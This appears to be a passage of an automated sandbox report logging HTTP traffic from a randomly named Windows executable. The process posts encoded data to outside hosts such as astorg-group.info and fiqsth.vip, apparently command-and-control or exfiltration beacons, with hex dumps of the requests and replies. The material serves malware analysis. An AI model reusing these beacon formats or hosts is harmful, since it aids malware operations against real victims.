                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 6e 48 4b 67 7a 39 79 41 6a 55 53 66 71 44 4a 2b 41 6b 53 77 53 42 31 70 70 30 73 35 4b 47 73 49 4e 66 66 2f 6a 63 3d
                                                                                                                                                  Data Ascii: W638b4U=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynunHKgz9yAjUSfqDJ+AkSwSB1pp0s5KGsINff/jc=
                                                                                                                                                  Nov 14, 2024 15:41:23.281769991 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:23 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  26192.168.2.550005217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:25.022552013 CET671OUTPOST /vdvc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  Origin: http://www.astorg-group.info
                                                                                                                                                  Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 74 4e 35 36 38 62 6f 36 6e 46 53 75 50 76 68 30 4c 73 50 6e 63 72 59 6f 54 78 73 6a 70 36 65 30 6b 4b 6e 32 64 64
                                                                                                                                                  Data Ascii: W638b4U=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jytN568bo6nFSuPvh0LsPncrYoTxsjp6e0kKn2dd
                                                                                                                                                  Nov 14, 2024 15:41:25.854955912 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:25 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  27192.168.2.550006217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:27.567817926 CET1688OUTPOST /vdvc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  Origin: http://www.astorg-group.info
                                                                                                                                                  Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 55 73 59 71 7a 6b 2f 67 77 43 68 41 42 66 37 38 55 56 78 63 76 38 58 6f 79 61 6d 6a 7a 58 47 30 73 59 64 74 50 68 36 43 41 4e 50 6c 38 2b 71 6a 74 51 37 45 2b 78 51 48 42 74 43 78 67 31 47 36 52 48 64 63 34 34 48 32 34 6c 31 57 46 44 47 49 6f 4b 68 57 59 38 74 63 66 53 33 35 4e 32 4b 55 66 74 6c 33 64 6a 2f 34 63 41 50 7a 75 30 36 38 6d 34 39 63 6e 69 72 69 4b 73 43 77 75 7a 4f 77 2b 61 36 32 6a 51 34 39 42 48 59 70 48 58 59 32 49 4a 74 61 6b 50 59 74 5a 52 47 54 2b 2b 6f 48 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZLTzMS0FxaxKQXpL9MiDTKR0wYW8baoTcf6l9+klycSLffdSTJFkDdcJb01cYAq7DJ9LEPOOygx6CrLiredU/O0vQExynh08GAXCC4GTp256/EORkAZq4QGjjVftpVl3B1UsYqzk/gwChABf78UVxcv8XoyamjzXG0sYdtPh6CANPl8+qjtQ7E+xQHBtCxg1G6RHdc44H24l1WFDGIoKhWY8tcfS35N2KUftl3dj/4cAPzu068m49cniriKsCwuzOw+a62jQ49BHYpHXY2IJtakPYtZRGT++oHAl26GCKcyHlqO8OiP1gu2pr9NbmoK/8g9JSZQek419ZFgCvzmcrTpZyM/ZOmh9rrJyW0ZrexUb2mb14Xj164ER9B2d9qbN81cplrJXqHJZfSlrsOH73gJhBR+ZiluprsYtX4+1NkS9oHsJ1ZQHa6aosJEyrP7UCbn7Ru2sLFNW635pH0gnbSZQUgeyR86UBrEj9fQtxNd+vXsu6Jtbu/OgHO6BPCecGqE6cjoNt2HVVtfdmIyu/n3f4GKhP95yMKYE78ysSWmV4b/1tagGZFnhHLXnCRK7qlKepbHW2wz96T/nmW317mlSsbypKFyG1hV16xJ9P5yzlHRT7M6+9dMCTcvIlzEYwhF1xzOGiaguTxvQZLEetPtpo2T25q7A2S5i++1eQy510Ip2WvV7CiXNHvcLn3+gEiN9vDSRc0jlPoKv2fHpGO6JedRDUWUuIfGeGOXM5xna0Xxr9AytfxHU7x1l1wJx/Yw1qCmRm9OpJA1+YtuxkoJSqWER6H/sogqXn23GyN+JFqIxkME1sRKDi21EsjX1WVT6Pg5ZkkYZqo3HvWhzPgX2l0xHtC9QEOecc98SQhhcjght9T8SetAj/YtP/v+d4B9pDisF1ryf6mRSNWiexVrVdx8qDO5r78vuFg7WXm8QhE4TS45KuBAmgJh6w8i5XQyp [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:41:28.371813059 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:28 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  28192.168.2.550007217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:30.107841015 CET386OUTGET /vdvc/?W638b4U=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRcKpdTLsadcBjXT18ECqhEbYKAo2NhS9FS63soq1W+eFfLA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:41:30.915450096 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:30 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'nonce-838fb3b572544910b15d5e9ad08c1b20';
                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                  Data Raw: 39 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 33 38 66 62 33 62 35 37 32 35 34 34 39 31 30 62 31 35 64 35 65 39 61 64 30 38 63 31 62 32 30 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-838fb3b572544910b15d5e9ad08c1b20';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
                                                                                                                                                  Nov 14, 2024 15:41:30.915812016 CET212INData Raw: 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d
                                                                                                                                                  Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https:/
                                                                                                                                                  Nov 14, 2024 15:41:30.915832043 CET1214INData Raw: 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c
                                                                                                                                                  Data Ascii: /whois.gandi.net/en/results?search=astorg-group.info"><strong>View the WHOIS results of astorg-group.info</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Park


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  29192.168.2.5500083.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:36.071978092 CET630OUTPOST /0m8a/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  Origin: http://www.fiqsth.vip
                                                                                                                                                  Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 52 74 32 74 34 67 51 6e 6c 38 47 33 4b 63 71 37 43 5a 35 52 6f 4a 39 72 59 45 7a 48 45 6e 6d 30 54 68 62 58 51 51 3d
                                                                                                                                                  Data Ascii: W638b4U=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYRt2t4gQnl8G3Kcq7CZ5RoJ9rYEzHEnm0ThbXQQ=


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  30192.168.2.5500093.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:38.611922979 CET650OUTPOST /0m8a/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  Origin: http://www.fiqsth.vip
                                                                                                                                                  Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 6c 46 37 4c 4d 45 57 30 47 50 75 77 78 72 4a 48 48 7a 58 49 72 6e 71 5a 69 66 42 4f 6e 4b 4c 6e 68 41 56 78 41 75
                                                                                                                                                  Data Ascii: W638b4U=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIlF7LMEW0GPuwxrJHHzXIrnqZifBOnKLnhAVxAu


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  31192.168.2.5500103.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:41.306106091 CET1667OUTPOST /0m8a/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  Origin: http://www.fiqsth.vip
                                                                                                                                                  Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 67 63 2b 56 6e 34 54 6f 46 7a 4e 76 71 6e 67 35 5a 4a 51 50 35 51 61 6e 64 42 61 70 31 35 4b 34 38 42 34 56 34 67 35 38 4e 71 6b 6f 7a 61 67 2f 42 54 62 35 39 75 79 78 64 4c 79 37 55 69 66 78 42 76 4e 36 58 54 4a 4c 53 2b 61 6e 7a 51 47 49 54 51 33 4d 79 79 50 36 78 33 52 30 36 72 62 38 59 62 2b 30 2f 48 79 71 78 2b 6a 74 61 4d 37 34 4d 39 45 4a 75 2b 5a 53 42 6a 6b 62 31 77 2b 46 4d 69 2b 49 73 48 38 6a 38 48 55 35 4e 6e 70 71 34 59 47 78 43 65 6d 78 6c 41 47 45 7a 58 66 6f 47 50 6e 65 33 48 44 4f 75 48 63 68 56 76 56 31 70 59 55 47 64 4a 61 31 42 41 37 35 2b 69 6d 37 51 50 68 5a 41 4f 52 53 73 47 46 45 61 67 73 5a 51 44 31 6e 4c 46 6b 73 65 6d 41 48 5a 48 48 72 30 64 6e 36 43 46 75 41 57 62 42 4e 37 41 56 47 6a 65 6b 66 68 48 67 33 6b 43 50 4d 6c 70 51 65 31 6d 4b 6a 31 44 72 46 70 54 38 50 79 42 45 4b 7a 43 76 7a 68 38 79 46 6b 74 48 7a 61 64 53 4b [TRUNCATED]
